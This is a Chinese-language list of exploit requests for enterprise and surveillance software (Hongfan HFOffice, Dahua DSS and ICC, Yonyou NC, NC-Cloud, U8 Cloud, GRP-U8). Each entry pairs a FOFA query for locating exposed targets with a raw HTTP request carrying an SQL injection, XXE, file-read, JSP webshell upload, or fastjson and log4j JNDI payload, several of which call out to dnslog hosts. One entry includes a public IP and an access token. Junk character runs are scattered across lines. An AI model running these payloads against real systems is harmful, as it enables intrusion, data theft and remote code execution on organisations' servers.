  i& ?& E9 t' |Accept-Encoding: gzip

' ~8 t" L, O: _1 O5 L
9 ^  m: A$ T# r" W9 C# q: f16.  红帆HFOffice医微云SQL注入
: I* X) I3 Q/ vFOFA：title="HFOffice"
poc中调用函数计算1234的md5值
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
7 ^$ f* R! U" }, ~( Z. N3 L- zUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( q0 U7 g+ O  ~& Z! VConnection: close
8 r/ l9 B' h* b" p  E( N) JAccept: */*
Accept-Language: en
Accept-Encoding: gzip
  f5 [, P- v7 U2 s
' `1 u/ w" R- e0 c' c2 v9 ^1 _
+ k* r: b9 U5 E( i17. 大华 DSS itcBulletin SQL 注入
6 p: C% ~' Q2 lFOFA：app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
- G: S- q* v3 c0 @9 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ z9 U$ w7 v; h7 \1 xConnection: close
) Z' `& e, ]- W" X* sContent-Length: 345
Accept-Encoding: gzip

) s" O& X/ c& R; \% x6 D<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
2 X" G' e; z# \( f' m2 v<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: E( H0 P8 J) x$ B5 R8 Z6 z      </netMarkings>
5 I) Z9 L9 \2 B" v    </ns1:deleteBulletin>
( o, ^( b7 U6 F  </s11:Body>
</s11:Envelope>


18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
* V9 T9 p( Z& g; u, BFOFA：app="dahua-DSS"
, `- }9 R0 A! iGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
5 I. N6 @$ r6 E) ~Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
: @- ?% D- _- a8 yAccept: */*
' F9 @- I& g# p7 a! LConnection: keep-alive


' R: R9 X' C2 T- r' L* w3 W" z% x
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
FOFA：app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
0 [: k5 L" E3 b6 X. O( rHost:
5 J. K/ C# b: w: \% ]User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
6 J6 ]) l5 @- k: F. mAccept: */*
Connection: keep-alive


20. 大华ICC智能物联综合管理平台任意文件读取
/ g9 o5 q  w% {" C7 _FOFA：body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% @7 A/ `( P: T. FConnection: close
) J% P3 T: f; L2 `2 ^Accept: */*
Accept-Language: en
Accept-Encoding: gzip

  N. u2 J( t+ s
: ]7 z' k+ e7 G+ @8 Z/ }21. 大华ICC智能物联综合管理平台random远程代码执行
' x- ^8 d4 Z" y% eFOFA：icon_hash="-1935899595"
5 g3 {! C/ l9 s  qPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( t( |7 x) Q$ I( ~3 o3 N2 rHost: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ A# i: k# K: n% sContent-Length: 161
* W1 r2 w8 O. C7 AAccept-Encoding: gzip
  F2 H. R$ b9 a9 Z8 DConnection: close
5 U  l5 z; \! ?Content-Type: application/json;charset=utf-8

{
+ J0 L2 K! L8 P2 B* @"a":{
2 L0 z4 `5 L$ \   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
( X1 @: c% J7 F0 Z$ ?$ j0 `  }""
0 R5 T. a+ ?0 M1 p+ S& k4 ~) l}

9 m% ]. y1 |% f% B
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
/ Y" B) E; G8 Z6 O% ?2 p2 Q) ^2 KFOFA：icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
" @8 L) Y7 E- N2 ^  jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

) Y! h- r" B8 n4 D- F6 j{
  R$ n# y: ?' Y, }6 n5 \"loginName":"${jndi:ldap://dnslog}"
/ a( j& w* k% Z  D7 `* C. G}
. P- e- z& Z7 W8 x* v& f


3 y9 n/ c. s6 Z$ ?23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
0 c& ^# Q' _% K* \/ I! r! Y0 z4 WFOFA：icon_hash="-1935899595"
& n! L# w! j. N; ?- MPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
' E' D, y; b; g4 }6 ]% ]% ~! [Host: your-ip
; H  V9 t7 S+ w) c( s1 G6 Y# }$ W1 H2 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
  V  N6 n  w. ?6 lAccept-Encoding: gzip
2 `( S" \4 n+ s5 I* wConnection: close
+ r; Y0 h, {. @0 @  b0 y( [; x
{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
# ]% a" P2 D0 `  J+ k2 a: u       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}


24. 用友NC 6.5 accept.jsp任意文件上传
FOFA：icon_hash="1085941792"
2 B( W; K1 d3 ~! x3 i. h" ?POST /aim/equipmap/accept.jsp HTTP/1.1
$ j7 f% T( c% ]: L4 n+ E0 `6 {Host: x.x.x.x
$ v2 m' [/ r/ J* S3 X6 Y3 t0 c9 @User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
* {7 _! w  h9 \. A8 i4 E0 PConnection: close
9 }* {1 t- ]& X& h. jContent-Length: 449
; O9 R" d2 y3 aAccept: */*
Accept-Encoding: gzip
! {( ^8 ~, C' F, D' b9 TContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

- C' L& k1 l, _9 V! E  N9 N-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ l7 Q( x; W) _8 kContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain
9 H+ t" y" A0 j( ^
/ T) F1 O9 E2 k/ c<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
0 [( I& L" r9 k2 r# O- M# ]-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
# Z% T& ~2 I6 m# z8 @  p0 |9 R" J) nContent-Disposition: form-data; name="fname"
( j) Q1 m, x& y3 |; N  p6 p, o
; {6 [9 A& J' E7 S  H* X# h  I\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
) i* R' c- I; t2 v" C! B. {

9 `) |$ [, D( v4 _4 D  S3 R+ {25. 用友NC registerServlet JNDI 远程代码执行
FOFA：app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
% [) P" w. y% l. B5 U- dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
8 a6 V) @* R0 e4 ~Accept-Encoding: gzip, deflate
0 O1 r5 C/ g( ?; D% TAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
/ `) p# D+ J" F( zContent-Type: application/x-www-form-urlencoded
5 P1 ~" u; O( [6 Y5 q# ^
type=1&dsname=ldap://dnslog


$ B' X- x# x$ M! W9 a$ p7 o
' H# O( C$ ~/ {3 M. d26. 用友NC linkVoucher SQL注入
( }/ m% Q6 L" ^% j" E! L7 o8 KFOFA：app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  ?& e; A2 d; Y( u# O3 I+ {5 {7 OContent-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
# d. z% g* f' b1 J6 c3 z6 |" }Connection: keep-alive

0 I3 @8 U' _! s& q+ |% ?  m; x6 c
27. 用友 NC showcontent SQL注入
3 _4 Y( i1 F8 T! v: T, I  VFOFA：icon_hash="1085941792"
! U/ p, O/ ~3 h) p. O4 Z# iGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
/ `" s3 |. V9 ]- DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
" r6 D+ Z* ]/ O; wConnection: close
' g" y8 Y& a& T# }2 XContent-Type: text/xml; charset=utf-8
9 P$ x. P: D9 ?) t
9 f  T+ z+ Y6 k; z; P) B& X8 v
28. 用友NC grouptemplet 任意文件上传
& W8 H' A% D/ S  ?2 DFOFA：icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
- y2 c) e  b' w7 r$ h9 F' k1 Q2 |Host: x.x.x.x
2 C8 v( [! G1 v3 O  u; e3 L' QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
6 l$ z: ~/ E& B# w0 ^$ x6 dContent-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip
, @* S( ~6 g& g
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream
% r" b! q  |6 s7 b: I; A
6 M2 @( t# x* H<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
  m8 N% M) y# S5 ^4 B4 j, ?  f9 A" n

/uapim/static/pages/nc/head.jsp
7 w2 T4 X& |( p( C
2 L' T% C) A, s% C$ Y1 D29. 用友NC down/bill SQL注入
FOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
% J5 p% H% b( h1 @1 t9 \! S9 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ A" p( |% A) CContent-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
; Q; {! O0 J( D, ^8 e/ AConnection: keep-alive
3 N8 ?# h6 V  ?7 ~4 A& u6 Y1 n

0 ~" U8 E' Q+ m: _5 U30. 用友NC importPml SQL注入
FOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"
5 e  x8 O6 y1 UPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
6 ?$ c; T1 k5 H4 ?/ {4 Q1 SContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
) {3 P5 F$ v+ K9 N. `Connection: close

5 s6 ^3 J4 N( D- B+ B- Q------WebKitFormBoundaryH970hbttBhoCyj9V
& k4 E2 x0 q0 Q0 UContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
9 M2 T# ~0 h- B, o9 cContent-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--
# Y9 t9 G$ i: q; b" V
- X" J5 N" b* s
( v8 ^6 r4 _/ r+ u# ?' ]. u31. 用友NC runStateServlet SQL注入
version<=6.5
5 r  b& L) ]0 O) J: MFOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"
. K. |! c8 a  l' T. G7 r* pGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
+ C. t) s" ^; p3 f- N+ f; N  E+ mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. 用友NC complainbilldetail SQL注入
version= NC633、NC65
FOFA：app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, w; u6 e2 P: K& t5 [Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
3 f0 c) a1 T# t( h7 RAccept-Encoding: gzip, deflate
2 Y  B( F* v% h. |) MAccept: */*
Connection: keep-alive
- M3 G4 Y  D( i: w9 D5 [

  y* h- E: V# p$ r* u9 [0 M33. 用友NC downTax/download SQL注入
version：NC6.5FOFA：app="用友-UFIDA-NC"
% v# ~0 z& i1 Z5 c1 ]1 AGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! L' B8 x2 T& ~  r- x8 K* i% d1 wHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 l- U5 M  c' E% }7 w9 L  MContent-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
  A3 L0 ]# c; X% hAccept: */*
0 x* V1 i$ M. g5 CConnection: keep-alive
( h; Y* w% M6 j! S

) i; ?- x7 G0 W/ s4 _# O34. 用友NC warningDetailInfo接口SQL注入
FOFA：app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
& f* o4 N6 w6 o" o8 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 t  i7 k% Z; g+ ^/ b- lContent-Type: application/x-www-form-urlencoded
" d& f& Q: S; ?% `) NAccept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


- H" q9 a- Z  C. g% E& S0 |35. 用友NC-Cloud importhttpscer任意文件上传
FOFA：app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
6 f" Q- u" s" {3 U: s( |0 r6 H+ ^User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
0 u& a6 n& d* E* a, I6 f& \2 UConnection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
- Q  T; u3 m( X! r. lContent-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
: {# @" [4 G6 X% I
<%out.println(1111*1111);%>
% d( C( T9 F# F# R$ k--fd28cb44e829ed1c197ec3bc71748df0--
# f# B. o5 D6 x
  ^  b% `! u9 m, J6 J4 Y
36. 用友NC-Cloud soapFormat XXE
3 P( o6 B; ]6 o" N6 ]FOFA：body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
$ d  q9 s4 d& ?7 w! u* P7 D$ AHost: 192.168.40.130:8989
$ G' c8 k9 t) fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
$ A; e& ]. A& w% E) G0 o5 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: x$ O2 [7 O( ]" C0 d3 D/ \# RAccept-Encoding: gzip, deflate
9 m. o" u( [3 D, ]# i5 R$ b; kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& S# z2 p4 O" Y1 v$ O* n7 ~2 ZConnection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
2 x# j$ B# |" p  I
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
6 M) |6 g5 H* \2 H# h1 J7 J  C- @) g3 Q

37. 用友NC-Cloud IUpdateService XXE
FOFA：body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ m& g( n6 g' Y) vHost: 192.168.40.130:8989
% w0 g+ q6 g  o$ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
7 x, S5 U9 B/ h, f! T- w, ]+ JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 s! @# j$ N( a2 i( s2 _  M+ T. [Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
6 W! e/ @7 ?* s! P8 ^$ zConnection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
8 w0 b5 v- k: [Upgrade-Insecure-Requests: 1

$ R, R9 Q7 z* ]<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
) S; J2 C. k! v# H: F1 ~  O) C<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
( a7 s* h; Z1 B) R) Y9 g5 [: I3 K/ c+ N3 h+ d<xxx/>]]></iup:string>
# V/ d: A& v. h1 m7 P7 }- \</iup:getResult>
- u4 F6 L: X. ~8 v+ m</soapenv:Body>
) i* ~8 s- [" E6 T& F: T8 f</soapenv:Envelope>
8 {) x  N4 }5 t2 J1 V5 i


38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA：app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
( [# V- t' ~$ u, gContent-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
7 M$ D7 g/ Q( \9 qAccept-Language: zh-CN,zh;q=0.9
! i5 K: ^- t0 U+ i9 Y' }Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

! D7 @5 q; g* e6 u( Q, k' b
39. 用友U8 Cloud RegisterServlet SQL注入
' ?. N8 V/ }7 Z5 o4 ?FOFA：title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
. h, `2 {6 N' g. u7 KHost: 192.168.86.128:8089
6 T  l+ W7 s( t6 \, q& [  uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
$ Y& U3 i# X# G9 R- WConnection: close
$ J8 f+ |# U: @+ f! KContent-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
0 u7 W9 x: m- R$ L  n8 v4 g1 _X-Forwarded-For: 127.0.0.1
7 u* C7 ~% n% T% u2 \Accept-Encoding: gzip
8 v- o0 ]1 a$ Z$ b& k8 d4 k
) K7 g1 c* B1 Tusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
# E3 P1 P) Z8 W8 }- f' z
, g) G1 B* N: o+ F- M9 K
40. 用友U8-Cloud XChangeServlet XXE
% d/ G# T$ W  QFOFA：app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close
3 @$ e/ D4 T, B8 R  N  i' e+ |
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
& n2 g$ n, T& t) A% ^) f, _
' t' v: A( Y" a7 Z# o$ z* f0 x1 q, A8 d
' Z. B; u/ ^! l" A* R4 h41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
! N% r9 X5 a( ~+ G8 U8 R& ~* EFOFA：app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
& \5 J4 ^/ p3 EHost:
( ~$ F3 e- V3 u" P1 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
: y; T7 L2 C$ L: EAccept-Encoding: gzip
0 m4 z$ V" D+ Y$ Q1 M( z3 M. O' cConnection: close
! e% H5 ^( V0 T0 w

( H5 N* |9 y; T$ K8 Y; H$ t42. 用友GRP-U8 SmartUpload01 文件上传
FOFA：app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
8 V+ X; s( o( d% S# R1 LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
4 D: L) L7 K+ u2 q5 q( C, hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
2 e& r# a6 S9 S) R8 K. }
$ W$ O, h/ m* y' F& z. ]2 ]  _PAYLOAD


9 t. w/ e- x# F, t4 Hhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL注入致RCE
FOFA：app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
' Q, F' D& J$ R1 ~* oHost: your-ip
: v) a) Y' n5 v1 v* w/ DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
& E& G% n8 |' r' T+ ~- OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
9 M& P4 \8 K6 K, I  @  q$ w7 vAccept-Language: zh-CN,zh;q=0.9
* v, x0 ?( g5 Y$ s0 e! W3 h* `# @Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
5 [4 B. W9 V: B! d% N
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
$ \  d' q! O5 y" L, X$ y: K   <soapenv:Body>
# H2 _4 }& e3 {& ^! R      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+ A; X4 \, F( i, d7 p. X' K         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
  h: j* v- m8 H' N8 w8 {   </soapenv:Body>
</soapenv:Envelope>
$ E3 M- [1 u) l1 b/ Q0 S

) Y6 p, H8 s' U" g- [44. 用友GRP-U8 bx_dj_check.jsp SQL注入
  ?& u6 i# \. t3 t" @0 BFOFA:app="用友-GRP-U8"
+ C. R1 E  j% ?6 R+ h/ ~& U' y: tGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
8 B( C0 Y2 Y/ t5 v7 tHost: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
) a1 v  {: C' m" n6 s2 P2 t6 yAccept-Language: zh-CN,zh;q=0.9
) _. d5 @: v+ _( w# \, `! x7 yConnection: close

3 N0 f- W9 x  f  v" Y
* ^9 a# R  W5 [! q1 W2 c! k45. 用友GRP-U8 ufgovbank XXE
) o# j# m' H$ \8 G. aFOFA：app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
8 m- m8 Q' k0 s! pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ q' b* w  a: AContent-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
8 F2 c" U" i/ N4 h
3 a* N/ {1 _+ f. Z# D; ]4 _1 {reqData=<?xml version="1.0"?>
6 \9 [" G( b" D1 O<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


2 }' ]$ q0 v. g# \46. 用友GRP-U8 sqcxIndex.jsp SQL注入
FOFA：app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
  ~. z2 f- X+ GHost: your-ip
' t6 B9 @+ N% B# T7 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
% S6 b( |. X& \+ c. C, L& p0 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
